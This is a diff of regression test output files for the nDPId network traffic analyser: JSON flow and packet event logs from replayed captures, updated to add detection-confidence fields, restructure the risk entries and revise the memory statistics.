 00968{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258162014582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":422,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":422,"pkt_l4_len":388,"ts_msec":1258162014582,"pkt":"AAAMB6wcAFBWmXinCABFAAGYOjtAAIAGGFUKRIl2CgMJEx+bnriXAiqLAq1VHlAY9oqoWgAASFRUUC8xLsUgMjAwIE9LDQpEYXRlOiBTYXQsIDE0IE5vdiAyMDA5IDAxOjJGOjI3IEdNVA0KU2VydmVyQiBTdW4gR2z6cnNGaXNoIEVudGVycHJpc2UgU2VydmVyIHYyLjENClgtUG93ZXJlZC1CeTogU2VydmxldC8yLjUNCkNvbnRlbnQtVHlw5TogdGV4dC94bWw7Y2hhcnNldD0idXRmLTgiDQpDb250ZW50LUxlbmd0aEwgMTc4DQoNCjw\/eG1sIHZlcnNpb249IjEuMCIgPz48UzpFbnZlbG9wZSB4bWxuczpTPSJodHRwOi8vc2NoZW9hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+PFM6Qm9keT48bnMyOmNvbmZpZ3VyZVJlSnBvbnNlIHhtbG5zOm5zJQAidXJpOi8vYWxjYXRlbC5jb20vYXBjLzIuMCIvPjwvUzpCb2R5PjwvUzpFbnZlbG9wZT4="}
-00760{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1258162014557,"flow_last_seen":1258162069942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":1494,"flow_avg_l4_payload_len":213,"midstream":0,"ts_msec":1258165452647,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00949{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1258162014557,"flow_last_seen":1258162069942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":1494,"flow_avg_l4_payload_len":213,"midstream":0,"ts_msec":1258165452647,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1258165452647,"flow_last_seen":1258165452647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1258165452647,"l3_proto":"ip4","src_ip":"10.68.137.118","dst_ip":"10.3.9.19","src_port":8091,"dst_port":40632,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1258165452647,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1258165452647,"pkt":"AAAMB6wcAFBWmXinCABFAAA0LcAAAIAGZjQKRIl2CgMJEx+bnrjjt2XlI9vFB4AS+vA0cwACAgQFtAEDAwABAQQC"}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1258165452652,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1258165452652,"pkt":"AFBWmXinAB9to6gACABFAAAoGsxAADwGfTQKAwkTCkSJdp64H5sj28UH47dl5lAQwhBWHwAAAAAAAAAA"}
 01077{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":10,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":576,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":576,"pkt_l4_len":0,"ts_msec":1258165452669,"pkt":"AFBWmXinAB9to6gACABFAAoyGs1AADwGeykKAwkTCkSJdp64H5sj28X747el5lAYwhBevQAAUE9TVCAvQXBjbi9BcGNSZW1vdGVTZXJ2aVhlIEhUVFAvMS4xDQpTT09QQWN0aW9uOiANCkNvbnRlbnQtdHlwZTogQXBwbGljYXRpb24veG1sDQpVc2VyLUFnZW50OiBKYWthcnRhIENvbW1vbnMtSHR0cENsaWVudC8zLjAuMQ0KSG9zdDogMTAuNjguMTM3LjExODo4MDkxDQpDb250ZW50LUxlbmd0aDogMzQ0DQoNCjxzb2FwZW52OkVudmVsb3BlIHhtbG5zOm5zPSJ1cmk6Ly9hbGNhdGVsLmNvbS9hcGMvMi4wIiB4bWxuczpzb2FwZW52PSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zcmFwL2VudmVsb3BlLyI+CiAgPHNvYXBlbnY6SGVhZGVyLz4KICA8c29hcGVudjpC8WR5PgogICAgPG5zOmdldENvbmZpZ3VyZWRUZW1wbGF0ZT4KICAgICAgPG9iamVjdE5hbWU+TldNOToxLTEtMS0xOTwvb2JqZWN0TmFtZT4KICAgICAgPHRlbXBsYXRlTmFtZT5YRFNMX0FUTV9QVE08L3RlbXBsYXRlTmFtZT4KICAgIDwvbnM6Z6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":10,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","l4_data_len":542}
 01394{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1258165452676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":739,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":739,"pkt_l4_len":705,"ts_msec":1258165452676,"pkt":"AAAMB6wcAFBWmXinCABFAALVLctAAIAGI4gKRIl2CgMJEx+bnrjjt2XmI9vHEVAY+OaplwAASFdUUC8xLjEgNTAwIElucGVybmFsIFNlcnZlciBFcnJvcg0KRGF0ZTogU2F0LCAxNCBOb3YgMjAwOSAwMjoyNDo0OCBHTVQNClNlcnZlcjogU3VuIEdsYXNzRmlzaCBFbnRlcnByaXNlIFNlcnZlciB2Mi4xDQpYLVBvd2VyZWQtQnk6IFNlcnZsZXQvMi41DQpDb250ZW50LVR5cGU6IHRleHQveG1sO2NoYXJzZXQ9InV0Zi04Ig0KQ29udGVudC1MZW5ndGg6IDQ1Nw0KQ2+4bmVjdGlvbjogY2xvc2UNCg0KPD94bWwgdmVyc2l\/bj0iMS4wIiA\/PjxTOkVudmVsb3BlIHhtbG6pOlM9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXBvZW52ZWxvcGUvIj48UzpCb2R5PnJTOkZhdWx0IHhtbG5zOm5zND0iaHR0cDovL3d3dy53My5vcmcvMjAwMy8wNZdzeGFwLWVudmVsb3BlIj48ZmF1bHRjb2RlPlM6U2VydmVyPC9mYXVsdGNvZGU+PGZhdWx0c3RyaW5nPjwvZmF1bHRzdHJpbmc+PGRldGFpbD48bnMyOlJlbW90ZUFwY0V4Y2VwdGlvbiB4bWxuczpuczI9InVyaTovL2FsY2F0ZWwuY29tL2FwYy8yLjAiPjxtZXNzYWdlPlRoZSB0ZW1wbGF0ZSBpcyBub3QgY29uZmlndXJlZCBvbiB0aGlzIHBvcnQ8L21lc3NhZ2U+PGVycm9yQ29kZT5URU1QTElURV9OT1RfQ09ORklHVVJFRDwvZXJMb3JDb2RlPjwvbnMyOlJlbW90ZUFwY0V4Y2VwdGlvbj48L2RldGFpbD48L1M6RmHSbHQ+PC9TOkI3ZHk+PC9TOkVudmVsb3BlPg=="}
-00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1258165452647,"flow_last_seen":1258165452688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":685,"flow_tot_l4_payload_len":685,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1258165452688,"l3_proto":"ip4","src_ip":"10.68.137.118","dst_ip":"10.3.9.19","src_port":8091,"dst_port":40632,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00679{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1258165452647,"flow_last_seen":1258165452688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":685,"flow_tot_l4_payload_len":685,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1258165452688,"l3_proto":"ip4","src_ip":"10.68.137.118","dst_ip":"10.3.9.19","src_port":8091,"dst_port":40632,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00604{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1258165452647,"flow_last_seen":1258165452688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":685,"flow_tot_l4_payload_len":685,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1258165452688,"l3_proto":"ip4","src_ip":"10.68.137.118","dst_ip":"10.3.9.19","src_port":8091,"dst_port":40632,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00187{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","total-events-serialized":16}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -22,9 +22,9 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4598554 bytes
-~~ total memory freed........: 4598554 bytes
-~~ total allocations/frees...: 99574/99574
+~~ total memory allocated....: 4683179 bytes
+~~ total memory freed........: 4683179 bytes
+~~ total allocations/frees...: 101164/101164
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 192 chars
 ~~ json string max len.......: 1987 chars
diff --git a/test/results/nest_log_sink.pcap.out b/test/results/nest_log_sink.pcap.out
index e7f9e3142..e04b2e5a4 100644
--- a/test/results/nest_log_sink.pcap.out
+++ b/test/results/nest_log_sink.pcap.out
@@ -3,112 +3,112 @@
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1536712992228,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1536712992228,"pkt":"AJD7JidrGLQwJjRACABFAAAoL2IAAP8GYxrAqPIPI65S7fdsK1cIqL8\/xIBhhVAQD+Vl6gAAAAAAAAAA"}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1536712992289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1536712992289,"pkt":"GLQwJjRAAJD7JidrCABFAAAoNpRAAC0G7egjrlLtwKjyDytX92zEgGGFCKi\/QFAQgdDz\/QAA"}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1536713052295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1536713052295,"pkt":"AJD7JidrGLQwJjRACABFAAAoL2MAAP8GYxnAqPIPI65S7fdsK1cIqL8\/xIBhhVAQD+Vl6gAAAAAAAAAA"}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":52,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1536712992228,"flow_last_seen":1536713593982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1536713593982,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","ndpi": {"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1536712992228,"flow_last_seen":1536713593982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1536713593982,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","ndpi": {"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":52,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1536712992228,"flow_last_seen":1536713593982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1536713593982,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1536712992228,"flow_last_seen":1536713593982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1536713593982,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1536714602587,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1536714602587,"pkt":"AJD7JidrGLQwJjRACABFAABEL4kAAP8RJr3AqPIPwKjyAc5xADUAMKk+CwgBAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1536714602587,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1536714602587,"pkt":"GLQwJjRAAJD7JidrCABFAABUsrpAAEARInzAqPIBwKjyDwA1znEAQGW0CwiBgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602612,"flow_last_seen":1536714602612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1536714602612,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1536714602612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1536714602612,"pkt":"AJD7JidrGLQwJjRACABFAAAsL4oAAP8GGxPAqPIPI7yauvduK1cIvyQjAAAAAGACEgDGgwAAAgQEgAAA"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1536714602681,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1536714602681,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX927RT8zNCL8kJGASbvDKWAAAAgQFjA=="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1536714602684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1536714602684,"pkt":"AJD7JidrGLQwJjRACABFAAAoL4sAAP8GGxbAqPIPI7yauvduK1cIvyQk0U\/MzlAQEgA+3gAAAAAAAAAA"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714602612,"flow_last_seen":1536714604778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536714604778,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","ndpi": {"proto":"NestLogSink.Google","breed":"Acceptable","category":"Cloud"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714602612,"flow_last_seen":1536714604778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536714604778,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1536714607328,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1536714607328,"pkt":"AJD7JidrGLQwJjRACABFAABXL7IAAP8RJoHAqPIPwKjyAc5xADUAQyQGbMYBAAABAAAAAAAAB2N6ZmUxMDUHZnJvbnQwMQVpYWQwMQpwcm9kdWN0aW9uBG5lc3QDY29tAAABAAE="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714607530,"flow_last_seen":1536714607530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1536714607530,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1536714607530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1536714607530,"pkt":"AJD7JidrGLQwJjRACABFAAAsL7MAAP8GYsXAqPIPI65S7fdvK1cIymiPAAAAAGACEgDJ5gAAAgQEgAAA"}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1536714607594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1536714607594,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX92+qr\/jxCMpokGASaQPN\/AAAAgQFtA=="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1536714607597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1536714607597,"pkt":"AJD7JidrGLQwJjRACABFAAAoL7QAAP8GYsjAqPIPI65S7fdvK1cIymiQqq\/48lAQEgA8vQAAAAAAAAAA"}
